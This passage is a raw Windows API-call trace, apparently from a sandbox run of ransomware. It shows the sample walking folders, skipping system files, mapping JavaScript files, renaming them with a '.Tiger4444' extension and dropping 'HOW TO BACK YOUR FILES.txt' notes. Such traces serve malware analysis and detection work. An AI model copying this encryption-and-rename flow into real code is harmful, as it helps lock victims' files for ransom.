ftCreationTime.dwLowDateTime=0x7e0a1462, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7e0a1462, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7e0a1462, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0041.981] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.981] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0041.981] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6143a6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea6143a6, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0041.981] lstrcmpiW (lpString1="css", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.981] lstrcmpiW (lpString1="css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.981] lstrcmpiW (lpString1="css", lpString2="Tiger4444.exe") returned -1 [0041.982] lstrcmpiW (lpString1="css", lpString2=".") returned 1 [0041.982] lstrcmpiW (lpString1="css", lpString2="..") returned 1 [0041.982] lstrcmpiW (lpString1="css", lpString2="windows") returned -1 [0041.982] lstrcmpiW (lpString1="css", lpString2="bootmgr") returned 1 [0041.982] lstrcmpiW (lpString1="css", lpString2="pagefile.sys") returned -1 [0041.982] lstrcmpiW (lpString1="css", lpString2="boot") returned 1 [0041.982] lstrcmpiW (lpString1="css", lpString2="ids.txt") returned -1 [0041.982] lstrcmpiW (lpString1="css", lpString2="NTUSER.DAT") returned -1 [0041.982] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="css" | out: lpString1="css") returned="css" [0041.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66440 [0041.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6a) returned 0xc89950 [0041.982] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66448 | out: ListHead=0xc66828, ListEntry=0xc66448) returned 0xc665a8 [0041.982] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea61ff59, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0041.982] lstrcmpiW (lpString1="js", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.982] lstrcmpiW (lpString1="js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.982] lstrcmpiW (lpString1="js", lpString2="Tiger4444.exe") returned -1 [0041.982] lstrcmpiW (lpString1="js", lpString2=".") returned 1 [0041.982] lstrcmpiW (lpString1="js", lpString2="..") returned 1 [0041.982] lstrcmpiW (lpString1="js", lpString2="windows") returned -1 [0041.982] lstrcmpiW (lpString1="js", lpString2="bootmgr") returned 1 [0041.982] lstrcmpiW (lpString1="js", lpString2="pagefile.sys") returned -1 [0041.982] lstrcmpiW (lpString1="js", lpString2="boot") returned 1 [0041.982] lstrcmpiW (lpString1="js", lpString2="ids.txt") returned 1 [0041.982] lstrcmpiW (lpString1="js", lpString2="NTUSER.DAT") returned -1 [0041.982] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="js" | out: lpString1="js") returned="js" [0041.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66320 [0041.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x68) returned 0xc60fe8 [0041.982] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66328 | out: ListHead=0xc66828, ListEntry=0xc66328) returned 0xc66448 [0041.982] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea61ff59, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0041.982] FindClose (in: hFindFile=0xc72f08 | out: hFindFile=0xc72f08) returned 1 [0041.982] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0041.982] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0041.984] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0041.984] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0041.984] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.984] CloseHandle (hObject=0x260) returned 1 [0041.984] CloseHandle (hObject=0x2ac) returned 1 [0041.985] GetCurrentThreadId () returned 0xfa8 [0041.985] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66328 [0041.985] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js" [0041.994] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0041.994] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66320 | out: hHeap=0xc50000) returned 1 [0041.994] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js" [0041.994] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\" [0041.994] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\.BFC0E91B00AE8A0620D3" [0041.994] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0041.996] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0041.999] FlushFileBuffers (hFile=0x2ac) returned 1 [0042.000] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0042.001] CloseHandle (hObject=0x2ac) returned 1 [0042.001] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js") returned 51 [0042.002] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.002] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7e0c7774, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0042.002] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.002] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0042.002] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0042.002] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.002] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7e0c7774, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.002] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.002] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0042.002] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0042.002] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.002] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.002] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7e0c7774, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7e0c7774, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7e0c7774, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0042.002] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.002] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0042.002] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea61ff59, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1395c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="base.js", cAlternateFileName="")) returned 1 [0042.002] lstrcmpiW (lpString1="base.js", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0042.002] lstrcmpiW (lpString1="base.js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.002] lstrcmpiW (lpString1="base.js", lpString2="Tiger4444.exe") returned -1 [0042.002] lstrcmpiW (lpString1="base.js", lpString2=".") returned 1 [0042.002] lstrcmpiW (lpString1="base.js", lpString2="..") returned 1 [0042.002] lstrcmpiW (lpString1="base.js", lpString2="windows") returned -1 [0042.002] lstrcmpiW (lpString1="base.js", lpString2="bootmgr") returned -1 [0042.002] lstrcmpiW (lpString1="base.js", lpString2="pagefile.sys") returned -1 [0042.002] lstrcmpiW (lpString1="base.js", lpString2="boot") returned -1 [0042.002] lstrcmpiW (lpString1="base.js", lpString2="ids.txt") returned -1 [0042.002] lstrcmpiW (lpString1="base.js", lpString2="NTUSER.DAT") returned -1 [0042.002] lstrcpyW (in: lpString1=0x30aeb10, lpString2="base.js" | out: lpString1="base.js") returned="base.js" [0042.002] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js", dwFileAttributes=0x0) returned 1 [0042.003] lstrlenW (lpString="base.js") returned 7 [0042.003] lstrlenW (lpString="Tiger4444") returned 9 [0042.003] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0042.003] lstrlenW (lpString=".dll") returned 4 [0042.003] lstrcmpiW (lpString1="e.js", lpString2=".dll") returned 1 [0042.003] lstrlenW (lpString=".lnk") returned 4 [0042.003] lstrcmpiW (lpString1="e.js", lpString2=".lnk") returned 1 [0042.003] lstrlenW (lpString=".ini") returned 4 [0042.003] lstrcmpiW (lpString1="e.js", lpString2=".ini") returned 1 [0042.003] lstrlenW (lpString=".sys") returned 4 [0042.003] lstrcmpiW (lpString1="e.js", lpString2=".sys") returned 1 [0042.003] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\base.js"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0042.003] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0042.003] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13345623363) returned 1 [0042.003] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=1283526) returned 1 [0042.003] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0042.003] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0042.003] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1398d0, lpName=0x0) returned 0x2c8 [0042.004] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1398d0) returned 0x30b0000 [0042.057] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0042.058] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0042.058] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0042.058] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0042.058] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0042.058] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0042.058] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0042.058] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0042.058] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13351101814) returned 1 [0042.058] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0042.058] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0042.058] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0042.197] CloseHandle (hObject=0x2c8) returned 1 [0042.197] CloseHandle (hObject=0x260) returned 1 [0042.226] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js.Tiger4444") returned 69 [0042.226] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\base.js"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\base.js.tiger4444"), dwFlags=0x1) returned 1 [0042.292] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=1283536 | out: Addend=0xc6f980) returned 4918432 [0042.292] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=54 | out: Addend=0xc6f98c) returned 2663 [0042.292] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea61ff59, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x2e7dba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ui.js", cAlternateFileName="")) returned 1 [0042.292] lstrcmpiW (lpString1="ui.js", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0042.292] lstrcmpiW (lpString1="ui.js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0042.293] lstrcmpiW (lpString1="ui.js", lpString2="Tiger4444.exe") returned 1 [0042.293] lstrcmpiW (lpString1="ui.js", lpString2=".") returned 1 [0042.293] lstrcmpiW (lpString1="ui.js", lpString2="..") returned 1 [0042.293] lstrcmpiW (lpString1="ui.js", lpString2="windows") returned -1 [0042.293] lstrcmpiW (lpString1="ui.js", lpString2="bootmgr") returned 1 [0042.293] lstrcmpiW (lpString1="ui.js", lpString2="pagefile.sys") returned 1 [0042.293] lstrcmpiW (lpString1="ui.js", lpString2="boot") returned 1 [0042.293] lstrcmpiW (lpString1="ui.js", lpString2="ids.txt") returned 1 [0042.293] lstrcmpiW (lpString1="ui.js", lpString2="NTUSER.DAT") returned 1 [0042.293] lstrcpyW (in: lpString1=0x30aeb10, lpString2="ui.js" | out: lpString1="ui.js") returned="ui.js" [0042.293] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js", dwFileAttributes=0x0) returned 1 [0042.293] lstrlenW (lpString="ui.js") returned 5 [0042.293] lstrlenW (lpString="Tiger4444") returned 9 [0042.293] lstrcmpiW (lpString1="\x03ꀀ", lpString2="Tiger4444") returned 1 [0042.293] lstrlenW (lpString=".dll") returned 4 [0042.293] lstrcmpiW (lpString1="i.js", lpString2=".dll") returned 1 [0042.293] lstrlenW (lpString=".lnk") returned 4 [0042.293] lstrcmpiW (lpString1="i.js", lpString2=".lnk") returned 1 [0042.293] lstrlenW (lpString=".ini") returned 4 [0042.293] lstrcmpiW (lpString1="i.js", lpString2=".ini") returned 1 [0042.293] lstrlenW (lpString=".sys") returned 4 [0042.293] lstrcmpiW (lpString1="i.js", lpString2=".sys") returned 1 [0042.293] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\ui.js"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0042.294] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0042.294] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13374670285) returned 1 [0042.294] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=3046842) returned 1 [0042.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0042.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0042.294] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2e80c0, lpName=0x0) returned 0x2c8 [0042.296] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0xe80c0) returned 0x2eb0000 [0042.677] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x30b0000 [0042.855] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0042.872] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0042.872] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0042.872] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0042.872] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0042.872] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0042.872] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0042.872] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0042.872] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0042.872] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13432555410) returned 1 [0042.873] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0042.873] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0042.873] UnmapViewOfFile (lpBaseAddress=0x2eb0000) returned 1 [0042.896] CloseHandle (hObject=0x2c8) returned 1 [0042.896] CloseHandle (hObject=0x260) returned 1 [0042.969] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js.Tiger4444") returned 67 [0042.969] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\ui.js"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\ui.js.tiger4444"), dwFlags=0x1) returned 1 [0042.979] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=3046848 | out: Addend=0xc6f980) returned 6201968 [0042.979] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=578 | out: Addend=0xc6f98c) returned 2717 [0042.979] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea61ff59, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x2e7dba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ui.js", cAlternateFileName="")) returned 0 [0042.979] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0042.979] lstrcpyW (in: lpString1=0x30aeb10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0042.979] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0042.980] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0042.980] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0042.981] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0042.982] CloseHandle (hObject=0x260) returned 1 [0042.982] CloseHandle (hObject=0x2ac) returned 1 [0042.982] GetCurrentThreadId () returned 0xfa8 [0042.982] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66448 [0042.982] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css" [0042.982] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0042.982] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66440 | out: hHeap=0xc50000) returned 1 [0042.982] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css" [0042.982] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\" [0042.982] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\.BFC0E91B00AE8A0620D3" [0042.983] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, 